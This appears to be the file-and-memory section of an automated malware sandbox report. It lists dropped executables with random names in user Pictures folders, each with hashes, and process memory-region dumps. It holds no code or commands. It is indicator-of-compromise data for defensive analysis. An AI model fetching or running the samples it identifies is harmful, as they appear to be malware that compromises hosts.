SHA512e5a1f17913ceecc6a58f6b41b606718594bcaff033e717102f1698992dffb988b82daa2e70b8a1ac335d11b7fcdd85d163f7180a8f614b38b8741a936ee46717
-
C:\Users\Admin\Pictures\Minor Policy\zZ4TgZcjSCMWOa6EHHHS4Tb7.exeFilesize
1.2MB
MD5268a9c9150fbe19f367acc7756a780f7
SHA1bdc3f307ba963ed9470a01722035ac0dfcf906e7
SHA256ad47a277b5ee673253ef0ea9aaeb5b1f053d1c1ba7950d91a858595974390ef1
SHA5123b3d52ce816f06d852d0dab080ab95b05a5f57c3d53077601c20a43600a18084adb46e430bf712447ce4b14e06547a730e6d6dde79ea8949eeefbbbc7f28fe97
-
\??\c:\users\admin\pictures\adobe films\hrk5tp8ogm4rl5elxua4h8p3.exeFilesize
250KB
MD5cfa76519beee3ea991380cdff924e5bc
SHA1c00ca4af9f14ce688a836a28743461d537866ae4
SHA256d14f5637911a056c175cf747b3237196a529fccdd308a9eb818a0083d58caf64
SHA512b68ea5b7705bb52d31554493a65c0f79e86ec47b4c3f8958015e97483d4897c4d87e5c2866895ca4f2bcf1bd6fc303798b69ac47a304f5d05049ca52e604fe05
-
\??\c:\users\admin\pictures\minor policy\1uynsxwyfa_nmhhtaw09gsau.exeFilesize
4.5MB
MD5140add24a025fce67149c992b1d57d41
SHA177fe8596d0c9f8243fc026be9049464b91cceeff
SHA2564d8faa87daf25e68ad293923d1878400f0ffb4bd6599591bf4c7d89421912de3
SHA512ee5ce78d2ca75e03933819071866e3233216ea9120b9c301ed4bf73a91c7e094a1fde9b26d318fa61e622cb244738a21ac8516b7f5ccdc01b63c52793bcaf6bb
-
\??\c:\users\admin\pictures\minor policy\7w99zla9pjexu0pfllqsmpkt.exeFilesize
1.5MB
MD5b2490e41f089cd37b69ca7e9f7866552
SHA154b5293f55843582a10da5566b67f92d301fc3e9
SHA25659e899850342fd8cec14c516dddf3394fe846f043b0959e3daa856969454587f
SHA512af6f06aff683ac0a907110100e138c563b83b44c5f51a1530425c76c310c92071e72b0f32fdeec539003a9507ed7db6f055cbc4c072c401a833e48d750b71b7f
-
\??\c:\users\admin\pictures\minor policy\applptwkqb25f0dnglwmczd7.exeFilesize
341KB
MD5c2b0d011647bc38575ab8531195ba70c
SHA19f73e32a01c57bb1b9de75db3a8f0be6fc69bef8
SHA25696e4cd33506a7cac32f459e8ce2062bb9f8b5b32c8b9270710c1d141273cd867
SHA5129295421938560e46c2fa0a3125c4d297fb21e3274bea72530dcd0174a83776f067cfe660ccfe15d59b573282f200b305ce2b0ab372cbf2e1779d85dab1ae7699
-
\??\c:\users\admin\pictures\minor policy\bojhotpgafdsdwgtomi65gbk.exeFilesize
1.7MB
MD5d3ecd7c908f0e0d428ed5b41e6442674
SHA10634645cd914d6511dea690470f30b187a49466b
SHA256509c166387d6563377e8f8b62c51fec85c23a2c75ac314de0640b2eee92efd2b
SHA512fca1dbc50620df6bb411fcd9f6ee4c4800edf39395735818aa62f4349ede7aae99ebb538e927e283b935483dbfc8ec8005e7dcc2f3d553981371da53bfd7ed26
-
\??\c:\users\admin\pictures\minor policy\ehfp4jekbb5tq05bxtxvm10a.exeFilesize
137KB
MD51cd36877d5e6e6fafa38f1c9f21cedf3
SHA1e02d4dfad2a1a82a5bc5f6125bb421a02c42d363
SHA256d273fc08938b54321f5d01dfa9200573efdf9d6fb9a2daf038aedd9d1f85ad65
SHA51298756c55b5a2d2497c854edd0a8b47cd36a22467280989ab3cc520b68307d08f91346f594453c6bbba73d296faca46bc7d996caf3fb0e261587efbb6c207569a
-
\??\c:\users\admin\pictures\minor policy\gcbxo38mx9eb6jbvgqrrdlo3.exeFilesize
4.6MB
MD5488ed95ee5ce3db2f1bb19959b09a421
SHA131cb520b2fb333c9b2e6f410b1ae9d465275db6e
SHA256665586b871e206ad81dcd24ca088cde672a618185182a0736c2ab7cad77a5a58
SHA512280dc9e12d765fd7f62d8da5655d9dc4320dc3bd9bc79c4e13d701bb00d5b243cd755d65272ca07c0731000943b580baac5af835741cb7da898db21a8c2729cc
-
\??\c:\users\admin\pictures\minor policy\ir9gjvrmntvpl00hiar6buay.exeFilesize
72KB
MD5338057ba65f786f4238be340d64daf08
SHA16571744dbdf2150179e46fbf4de2ce8ba715cbf2
SHA256bfb5009ee0d70c0e594a9f35fb56d541b91a9e7ab1f396ba01b986f1567e5bac
SHA51237e2a8a12dab1481bcb60fa8afdc9613cbff8e5d873754e3c6142e882d742c0f9ea19f1bac6ce1f6644b3e1c1022a7aab73105f53c2ccf4e9a71405fac89de34
-
\??\c:\users\admin\pictures\minor policy\lg1xsuuvopn_eehzwsiunnhw.exeFilesize
400KB
MD59519c85c644869f182927d93e8e25a33
SHA1eadc9026e041f7013056f80e068ecf95940ea060
SHA256f0dc8fa1a18901ac46f4448e434c3885a456865a3a309840a1c4ac67fd56895b
SHA512dcc1dd25bba19aaf75ec4a1a69dc215eb519e9ee3b8f7b1bd16164b736b3aa81389c076ed4e8a17a1cbfaec2e0b3155df039d1bca3c7186cfeb9950369bccf23
-
\??\c:\users\admin\pictures\minor policy\lxgb3skuprlcu64orv9jcmoi.exeFilesize
3.5MB
MD51052035ac557a9deda0fc39038159d23
SHA1ff12bc2d43224b3ac06f017243961cdf7088045f
SHA2566da85e0e847a77dc8e91dd59937d136e9a2f4e3f8bdd364d75e88b9149ea6ad3
SHA512d260cc7bf3585a098e6b93734208c536c225d77d5a69fefb40cd6c0820efab70dbd6c78ff4f95dfb8909b5c0a1f3b3f1274665460b36cdd9cb3e07a9c0fc8788
-
\??\c:\users\admin\pictures\minor policy\r8lbkwqfrjrwbe_59fwmzc6w.exeFilesize
3.8MB
MD5cd6124575280dd513412db5bd233d32a
SHA1a99cd43c0cf24a8379f74d32ca81067d502b0914
SHA256dfafcfd68e719844dd2b7626752cbf7c818e9de768fee5e5888d94e242baeabf
SHA512e5a1f17913ceecc6a58f6b41b606718594bcaff033e717102f1698992dffb988b82daa2e70b8a1ac335d11b7fcdd85d163f7180a8f614b38b8741a936ee46717
-
\??\c:\users\admin\pictures\minor policy\rpbx3d0f1v8sdszilvp_v9ej.exeFilesize
4.5MB
MD5bb6d7034fdf78ba8c3aabeb9373609fc
SHA19fe99724e83e83d1bc1c9619e03c7738e76b86ae
SHA25621037a51be5cb0df608545d07be89cad1948d0f4f02c607410f48dc8bccf5df5
SHA5128814b71b52f1b868cac0d936b4afe49b0538fd7bcee3030b9a9cbde82d8c761c9321ec591bde4e7386e77012c6b33f3c1d3bebc6ccdd3a9198b1059be9d2d29b
-
\??\c:\users\admin\pictures\minor policy\xgo12vpjdlo9diypn4sbpfs7.exeFilesize
382KB
MD59b57e42650ac3801c41097a7a67c8797
SHA1047b845b1fe47b819de4b31ade6e504aa0288e06
SHA256322f8b985672fe452211e1299a29037be69a9b467e8a8cdcad02afd0835e1dee
SHA5122361e69ad10dd9c75c732bcbbc01edf85b3bb0b07b357718e27657576a04d468cfc7a17c427e4cb8a3a3999c589077dd87fc3404a5bdde41de03278aba54ba85
-
\??\c:\users\admin\pictures\minor policy\zz4tgzcjscmwoa6ehhhs4tb7.exeFilesize
1.2MB
MD5268a9c9150fbe19f367acc7756a780f7
SHA1bdc3f307ba963ed9470a01722035ac0dfcf906e7
SHA256ad47a277b5ee673253ef0ea9aaeb5b1f053d1c1ba7950d91a858595974390ef1
SHA5123b3d52ce816f06d852d0dab080ab95b05a5f57c3d53077601c20a43600a18084adb46e430bf712447ce4b14e06547a730e6d6dde79ea8949eeefbbbc7f28fe97
-
memory/900-172-0x0000000000000000-mapping.dmp
-
memory/1848-147-0x0000000000000000-mapping.dmp
-
memory/2024-231-0x0000000000400000-0x000000000088B000-memory.dmpFilesize
4.5MB
-
memory/2024-194-0x0000000005190000-0x0000000005734000-memory.dmpFilesize
5.6MB
-
memory/2024-202-0x0000000005E10000-0x0000000005F1A000-memory.dmpFilesize
1.0MB
-
memory/2024-230-0x0000000006150000-0x00000000061B6000-memory.dmpFilesize
408KB
-
memory/2024-182-0x0000000000400000-0x000000000088B000-memory.dmpFilesize
4.5MB
-
memory/2024-159-0x0000000000000000-mapping.dmp
-
memory/2024-339-0x0000000000400000-0x000000000088B000-memory.dmpFilesize
4.5MB
-
memory/2024-174-0x0000000000400000-0x000000000088B000-memory.dmpFilesize
4.5MB
-
memory/2236-138-0x0000000000BD0000-0x0000000001692000-memory.dmpFilesize
10.8MB
-
memory/2236-137-0x0000000000BD0000-0x0000000001692000-memory.dmpFilesize
10.8MB
-
memory/2236-141-0x0000000000BD0000-0x0000000001692000-memory.dmpFilesize
10.8MB
-
memory/2236-199-0x0000000000BD0000-0x0000000001692000-memory.dmpFilesize
10.8MB
-
memory/2968-201-0x0000000005970000-0x0000000005F88000-memory.dmpFilesize
6.1MB
-
memory/2968-203-0x0000000005780000-0x0000000005792000-memory.dmpFilesize
72KB
-
memory/2968-166-0x0000000000000000-mapping.dmp
-
memory/2968-204-0x0000000005880000-0x00000000058BC000-memory.dmpFilesize
240KB
-
memory/2968-185-0x0000000000570000-0x0000000000598000-memory.dmpFilesize
160KB
-
memory/3084-168-0x0000000000000000-mapping.dmp
-
memory/3636-146-0x0000000000000000-mapping.dmp
-
memory/3636-237-0x0000000000400000-0x00000000005BC000-memory.dmpFilesize
1.7MB
-
memory/3636-241-0x0000000002230000-0x000000000223D000-memory.dmpFilesize
52KB
-
memory/3636-236-0x00000000021F0000-0x0000000002230000-memory.dmpFilesize
256KB
-
memory/3636-235-0x0000000000729000-0x000000000075B000-memory.dmpFilesize
200KB
-
memory/3636-240-0x0000000000600000-0x0000000000609000-memory.dmpFilesize
36KB
-
memory/3896-299-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/3896-327-0x0000000006470000-0x000000000648E000-memory.dmpFilesize
120KB
-
memory/4168-143-0x0000000000000000-mapping.dmp
-
memory/4168-179-0x0000000140000000-0x0000000140608000-memory.dmpFilesize
6.0MB
-
memory/4260-145-0x0000000000000000-mapping.dmp
-
memory/4292-167-0x0000000000000000-mapping.dmp
-
memory/4440-215-0x000000000050D000-0x0000000000534000-memory.dmpFilesize
156KB
-
memory/4440-275-0x0000000000400000-0x000000000045A000-memory.dmpFilesize
360KB
-
memory/4440-273-0x000000000050D000-0x0000000000534000-memory.dmpFilesize
156KB
-
memory/4440-216-0x00000000020A0000-0x00000000020E3000-memory.dmpFilesize
268KB
-
memory/4440-144-0x0000000000000000-mapping.dmp
-
memory/4440-218-0x0000000000400000-0x000000000045A000-memory.dmpFilesize
360KB
-
memory/4552-272-0x0000000007200000-0x0000000007276000-memory.dmpFilesize
472KB
-
memory/4552-208-0x0000000000230000-0x0000000000B9C000-memory.dmpFilesize
9.4MB
-
memory/4552-160-0x0000000000000000-mapping.dmp
-
memory/4552-233-0x0000000000230000-0x0000000000B9C000-memory.dmpFilesize
9.4MB
-
memory/4552-195-0x0000000000230000-0x0000000000B9C000-memory.dmpFilesize
9.4MB
-
memory/4552-277-0x0000000006B70000-0x0000000006BC0000-memory.dmpFilesize
320KB
-
memory/4552-207-0x0000000077B60000-0x0000000077D03000-memory.dmpFilesize
1.6MB
-
memory/4552-265-0x0000000077B60000-0x0000000077D03000-memory.dmpFilesize
1.6MB
-
memory/4924-183-0x0000000000400000-0x0000000000889000-memory.dmpFilesize
4.5MB
-
memory/4924-271-0x00000000070F0000-0x00000000072B2000-memory.dmpFilesize
1.8MB
-
memory/4924-197-0x00000000050E0000-0x0000000005172000-memory.dmpFilesize
584KB
-
memory/4924-276-0x00000000072D0000-0x00000000077FC000-memory.dmpFilesize
5.2MB
-
memory/4924-232-0x0000000000400000-0x0000000000889000-memory.dmpFilesize
4.5MB
-
memory/4924-165-0x0000000000000000-mapping.dmp
-
memory/4988-142-0x0000000000000000-mapping.dmp
-
memory/5008-173-0x0000000000000000-mapping.dmp
-
memory/5452-274-0x0000000000000000-mapping.dmp
-
memory/5724-346-0x0000000002A30000-0x0000000002B98000-memory.dmpFilesize
1.4MB
-
memory/5724-295-0x0000000002520000-0x0000000002706000-memory.dmpFilesize
1.9MB
-
memory/5724-289-0x0000000000000000-mapping.dmp
-
memory/5724-375-0x0000000002EC0000-0x0000000002F69000-memory.dmpFilesize
676KB
-
memory/5724-374-0x0000000002E00000-0x0000000002EBE000-memory.dmpFilesize
760KB
-
memory/5736-320-0x0000000000400000-0x0000000000443000-memory.dmpFilesize
268KB
-
memory/5736-328-0x0000000000400000-0x0000000000443000-memory.dmpFilesize
268KB
-
memory/5736-323-0x00000000006BD000-0x00000000006CE000-memory.dmpFilesize
68KB
-
memory/5736-279-0x0000000000000000-mapping.dmp
-
memory/5736-318-0x0000000000550000-0x0000000000559000-memory.dmpFilesize
36KB
-
memory/5744-315-0x0000000000400000-0x000000000045A000-memory.dmpFilesize
360KB
-
memory/5744-313-0x00000000004BD000-0x00000000004E4000-memory.dmpFilesize
156KB
-
memory/5744-278-0x0000000000000000-mapping.dmp
-
memory/5760-329-0x0000000000400000-0x000000000088B000-memory.dmpFilesize
4.5MB
-
memory/5760-280-0x0000000000000000-mapping.dmp
-
memory/5760-290-0x0000000000400000-0x000000000088B000-memory.dmpFilesize
4.5MB
-
memory/5820-338-0x000000000E110000-0x000000000E207000-memory.dmpFilesize
988KB
-
memory/5820-324-0x00000000023BD000-0x0000000002913000-memory.dmpFilesize
5.3MB
-
memory/5820-282-0x0000000000000000-mapping.dmp
-
memory/5820-336-0x0000000002202000-0x0000000002354000-memory.dmpFilesize
1.3MB
-
memory/5852-334-0x0000000000400000-0x00000000004CE000-memory.dmpFilesize
824KB
-
memory/5852-292-0x0000000000400000-0x00000000004CE000-memory.dmpFilesize
824KB
-
memory/5852-283-0x0000000000000000-mapping.dmp
-
memory/5864-285-0x0000000000000000-mapping.dmp
-
memory/5872-284-0x0000000000000000-mapping.dmp
-
memory/5888-342-0x0000000000710000-0x0000000000719000-memory.dmpFilesize
36KB
-
memory/5888-340-0x00000000007F9000-0x000000000082B000-memory.dmpFilesize
200KB
-
memory/5888-287-0x0000000000000000-mapping.dmp
-
memory/5888-341-0x0000000000400000-0x00000000005BC000-memory.dmpFilesize
1.7MB
-
memory/5888-343-0x0000000000790000-0x000000000079D000-memory.dmpFilesize
52KB
-
memory/5896-286-0x0000000000000000-mapping.dmp
-
memory/5896-301-0x0000000140000000-0x0000000140608000-memory.dmpFilesize
6.0MB
-
memory/5912-288-0x0000000000000000-mapping.dmp
-
memory/5912-317-0x0000000001F40000-0x0000000001F49000-memory.dmpFilesize
36KB
-
memory/5912-322-0x000000000053D000-0x000000000054D000-memory.dmpFilesize
64KB
-
memory/5976-291-0x0000000000000000-mapping.dmp
-
memory/6044-294-0x0000000000000000-mapping.dmp
-
memory/6044-304-0x0000000000540000-0x00000000017FB000-memory.dmpFilesize
18.7MB
-
memory/6044-331-0x0000000000540000-0x00000000017FB000-memory.dmpFilesize
18.7MB
-
memory/6168-297-0x0000000000000000-mapping.dmp
-
memory/6188-345-0x0000000000FA0000-0x0000000002241000-memory.dmpFilesize
18.6MB
-
memory/6188-298-0x0000000000000000-mapping.dmp
-
memory/6188-309-0x0000000000FA0000-0x0000000002241000-memory.dmpFilesize
18.6MB
-
memory/6224-300-0x0000000000000000-mapping.dmp
-
memory/6308-437-0x00000000022F0000-0x0000000002584000-memory.dmpFilesize
2.6MB
-
memory/6360-303-0x0000000000000000-mapping.dmp
-
memory/6576-308-0x0000000000000000-mapping.dmp
-
memory/6656-384-0x00000000039E0000-0x0000000003A89000-memory.dmpFilesize
676KB
-
memory/6656-383-0x0000000003920000-0x00000000039DE000-memory.dmpFilesize
760KB
-
memory/6656-310-0x0000000000000000-mapping.dmp
-
memory/6772-311-0x0000000000000000-mapping.dmp
-
memory/6772-312-0x0000000010000000-0x00000000106C4000-memory.dmpFilesize
6.8MB
-
memory/6996-321-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/6996-325-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/6996-319-0x0000000000000000-mapping.dmp
-
memory/7128-441-0x0000000010000000-0x00000000106C4000-memory.dmpFilesize
6.8MB
-
memory/7504-326-0x0000000000000000-mapping.dmp
-
memory/7588-330-0x0000000000000000-mapping.dmp
-
memory/7656-446-0x0000000000400000-0x0000000000435000-memory.dmpFilesize
212KB
-
memory/7656-448-0x0000000000400000-0x0000000000435000-memory.dmpFilesize
212KB
-
memory/7656-449-0x0000000000400000-0x0000000000435000-memory.dmpFilesize
212KB
-
memory/7724-332-0x0000000000000000-mapping.dmp
-
memory/7772-333-0x0000000000000000-mapping.dmp
-
memory/8008-335-0x0000000000000000-mapping.dmp
-
memory/8128-337-0x0000000000000000-mapping.dmp
-
memory/8232-344-0x0000000000000000-mapping.dmp
-
memory/8264-348-0x0000000000000000-mapping.dmp
-
memory/8372-351-0x0000000000000000-mapping.dmp
-
memory/8424-352-0x0000000000000000-mapping.dmp
-
memory/8464-353-0x0000000000000000-mapping.dmp
-
memory/8572-354-0x0000000000000000-mapping.dmp
-
memory/8616-356-0x0000000000000000-mapping.dmp
-
memory/8632-358-0x0000000000400000-0x000000000041C000-memory.dmpFilesize
112KB
-
memory/8632-357-0x0000000000000000-mapping.dmp
-
memory/8632-362-0x0000000000400000-0x000000000041C000-memory.dmpFilesize
112KB
-
memory/8776-363-0x0000000000000000-mapping.dmp
-
memory/8904-366-0x0000000000000000-mapping.dmp
-
memory/8932-367-0x0000000000000000-mapping.dmp
-
memory/9132-372-0x0000000000000000-mapping.dmp
-
memory/9156-373-0x0000000000000000-mapping.dmp
-
memory/9540-377-0x0000000000000000-mapping.dmp
-
memory/10052-380-0x0000000000400000-0x00000000004CF000-memory.dmpFilesize
828KB
-
memory/10476-387-0x0000000002600000-0x00000000027E6000-memory.dmpFilesize
1.9MB
-
memory/10476-426-0x00000000020F0000-0x00000000021AE000-memory.dmpFilesize
760KB
-
memory/10476-429-0x0000000002E30000-0x0000000002ED9000-memory.dmpFilesize
676KB
-
memory/24500-205-0x0000000000000000-mapping.dmp
-
memory/37532-213-0x0000000002600000-0x00000000027E6000-memory.dmpFilesize
1.9MB
-
memory/37532-268-0x0000000002F50000-0x0000000002FF9000-memory.dmpFilesize
676KB
-
memory/37532-266-0x0000000002AC0000-0x0000000002C28000-memory.dmpFilesize
1.4MB
-
memory/37532-267-0x0000000002D60000-0x0000000002E8C000-memory.dmpFilesize
1.2MB
-
memory/37532-209-0x0000000000000000-mapping.dmp
-
memory/37532-264-0x0000000002E90000-0x0000000002F4E000-memory.dmpFilesize
760KB
-
memory/47960-214-0x0000000000000000-mapping.dmp
-
memory/51124-234-0x0000000003D80000-0x0000000003FD4000-memory.dmpFilesize
2.3MB
-
memory/51124-307-0x0000000003D80000-0x0000000003FD4000-memory.dmpFilesize
2.3MB
-
memory/51124-219-0x0000000000000000-mapping.dmp
-
memory/60136-222-0x0000000000000000-mapping.dmp
-
memory/64956-223-0x0000000000000000-mapping.dmp
-
memory/68852-243-0x0000000000000000-mapping.dmp
-
memory/68896-225-0x0000000000400000-0x0000000000460000-memory.dmpFilesize
384KB
-
memory/68896-224-0x0000000000000000-mapping.dmp
-
memory/103648-395-0x0000000000400000-0x0000000000428000-memory.dmpFilesize
160KB